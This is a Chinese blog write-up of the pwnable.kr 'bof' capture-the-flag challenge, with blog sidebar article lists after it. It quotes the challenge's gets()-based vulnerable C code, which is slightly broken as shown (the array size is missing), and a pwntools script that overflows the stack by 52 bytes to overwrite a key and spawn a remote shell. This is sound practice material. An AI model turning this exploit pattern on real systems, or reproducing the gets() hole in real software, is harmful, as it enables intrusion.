pwnable.kr之bof
2024-09-07 20:09:55
打开题目:
先下载题目给我们的两个文件,查看文件信息:
发现没有执行的权限,所以先增加文件bof的执行权限,执行:
没发现啥,然后查看代码,
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
char overflowme[];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return ;
}
观察代码,知道只要使key==0xcafebabe就可拿到shell,然后查看flag。
所以开始调试找偏移。
调试后知道偏移为52,所以写一个python程序,代码为
from pwn import *
p=remote('pwnable.kr',9000)
payload='a'*52+'\xbe\xba\xfe\xca'
p.sendline(payload)
p.interactive()
拿到shell,输入cat flag,拿到flag
最新文章
- 初入网络系列笔记(5)FTP协议
- JdbcTemplate进行查询
- CRC 冗余校验计算
- bzoj 1066: [SCOI2007] 蜥蜴
- easy_painting
- OC - 22.隐式动画
- apache配置多站点
- mysql之ALTER COLUMN、CHANGE COLUMN、MODIFY COLUMN的区别
- 关闭QQ右下角弹窗小程序
- 【C#】 break continue return 的区别
- jQuery图片无缝轮播
- Docker 部署 portainer
- 国网电表dlt645-2007抄表软件
- word2vec 中的数学原理二 预备知识 霍夫曼树
- border可以这样给控件加边框
- Linux Shell常用技巧(二)
- Swift2.0语言教程之类的属性
- 控件属性和InitializeComponent()关系:
- 洛谷P1341 最受欢迎的奶牛
- redis哨兵集群、docker入门
热门文章
- XCTF-WEB-高手进阶区-PHP2-笔记
- 如何使用screen命令
- 调试备忘录-J-Link RTT的使用(原理 + 教程 + 应用 + 代码)
- 初 识 eric4
- AS 新电脑clone项目报错:Clone failed: Authentication failed for &#39;https://gitee.com/XXX/Demo.git/&#39;
- git操作练习
- I帧B帧P帧
- 第五篇Scrum冲刺博客--Interesting-Corps
- Soft-to-Hard Vector Quantization for End-to-End Learning Compressible Representations
- Logistic回归分析之二元Logistic回归